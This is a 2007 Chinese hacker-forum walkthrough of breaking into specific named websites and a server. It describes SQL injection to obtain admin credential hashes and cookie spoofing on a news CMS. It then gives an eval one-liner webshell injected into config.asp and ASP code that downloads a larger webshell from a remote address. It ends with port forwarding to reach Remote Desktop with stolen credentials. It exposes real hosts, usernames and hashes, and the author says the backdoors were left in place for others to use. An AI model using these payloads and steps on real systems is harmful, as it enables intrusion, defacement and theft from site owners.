仅仅是为了完善《对国内某知名黑客网站的一次渗透全过程+修改主页》http://www.hack58.net/Soft/html/13/25/2007/2007103011638.htm教程，绝无恶意。同时也希望多交几位志同道合的朋友。

1、排查摸底
从录像上看作者的旁注服务器来看IP地址为218.28.195.133。服务器为内网、系统为2000操作系统。先用明小子或"http://www.domaintools.com/reverse-ip","http://www.114best.com/ip"这几个看一下这个服务器的域名捆绑，得到http://www.xcym.com就一个站点。（与实际进入服务器后的IIS挂的站还是有较大的差异）。打开阿D注入工具，用百度查找"inurl:asp site:www.xcjzq.cn"很快得到注入点http://www.xcym.com/new/type.asp?typeid=20。注入后得到管理员用户：淅川移民 密码：32f99cd7518b70b2"，无法从http://www.cmd5.com破解。用阿D扫出后台“http://www.xcym.com/new/admin/login.asp”，从后台的页面可以知道这个站“淅川汽车减振器厂后台管理系统”。
 

2、绕道前行
看来只有从淅川汽车减振器厂的网站入手了。化费了点时间，从百度上找到这个站点，体力活还是需要足够细心。同样用阿D找到后台“http://www.xcjzq.cn/news/admin/login.asp”注入点“http://www.xcjzq.cn/news/type.asp?typeid=29”注入得到后台用户：xcjzq密码：b323c7bd5106f4cc（730419） 。有三个后台，进入第一个新闻及管理页面。从以前的经验来看，这个网站为沸腾新闻站整合系统。无注册（如有注册，可用NC提交直接注册管理员用户）新写个文章，文章管理=>添加文章=>选择任一栏目下一步=>选择大小类文章头加个一句话，执行http://www.xcjzq.cn/news/admin/createasp.asp更新首页链接ASP。用一句话服务端连接http://www.xcjzq.cn/news/lastnewsxp.asp。得到WEBSHELL。
 




  
3、直面目标
沸腾新闻有后台COOKIE欺骗漏洞，用明小子，进入淅川汽车减振器厂后台“http://www.xcjzq.cn/news/admin/index.asp”得到COOKIE“reglevel; fullname=%C5%ED%D1%F4; purview=99999; KEY=super; UserName=xcjzq; ASPSESSIONIDCCTTRDAT=CFNIABGDLCMDKBIPABELFIFH; Passwd=b323c7bd5106f4cc”用Cookis Browser.exe工具，先构造后台“http://www.xcym.com/new/admin/index.asp”构造cookie"reglevel;purview=99999; KEY=super; UserName=淅川移民; ASPSESSIONIDCCTTRDAT=AFLIABGDAOGHBHLOOIDJALCE; Passwd=32f99cd7518b70b2"。多试几次就可欺骗进入后台，注：观察图片Cookis Browser，第三项需为开锁状态。发现找不到“http://www.xcym.com/news/admin/createasp.asp”可能被作者改动了，事后证明改成了1.asp
上面的方法就行不通了。发现这个没改“http://www.xcym.com/news/inc/config.asp”在后台找到=>>系统管理=>>网站属性=>>上传文件大小
构造如下一句话“2000"%><%Eval(Request(chr(113)))%><%'" 注意后面有点，连接密码ASC码“q”。用一句话服务端连接“http://www.xcym.com/news/inc/config.asp”得到小马WEBSHELL。发现大马写入后无法常执行,先写个这类似下载的ASP
<%
Set xPost = CreateObject("Microsoft.XMLHTTP")
xPost.Open "GET","下载地址注大马改成TXT后缀",False '
xPost.Send()
Set sGet = CreateObject("ADODB.Stream")
sGet.Mode = 3
sGet.Type = 1
sGet.Open()
sGet.Write(xPost.responseBody)
sGet.SaveToFile Server.MapPath("ysjy.asp 注：可随意改"),2
set sGet = nothing
set sPOST = nothing
%>
打开写入的下载马、自动得到大马
 



 



 

4、内网提权
提权的方法有多种，我找到个最简单的，在c:\Recycled 回收站下顺利找到作者用户及密码。对待内网用工具作端口转向，1、上传客户端fport.exe到回收站 2、内网用户映射自己的1800、3389端口 3、FportClient监听 4、在WEBSHELL里执行(这个服务器直接执行命令，有wscript.shell可上传相对应的cmd.exe。.注：2000系统与2003的cmd.exe不同。)"C:\Recycled\fport 3389 自已的外网IP 1800" 4、连接成功后，在终端连接器写入自己的外网IP，人家的用户及密码。顺利进入服务器。
 







 
 
 
总结：说实话入侵一下指定的站还是比较累人的。本人老小菜一个，都是利用现有条件，没什么新技术。没能通知管理员的习惯，就不删除后门了大家也去验证自己的技术，绝对反感人家挂MS07004 的这类卡IE的网马，这样会搞在网站都不能进。

                                            一手夹烟
                                            2007/10/30

声明：原创文章，转载请指明来自华夏黑客同盟（www.77169.com)。违者必究！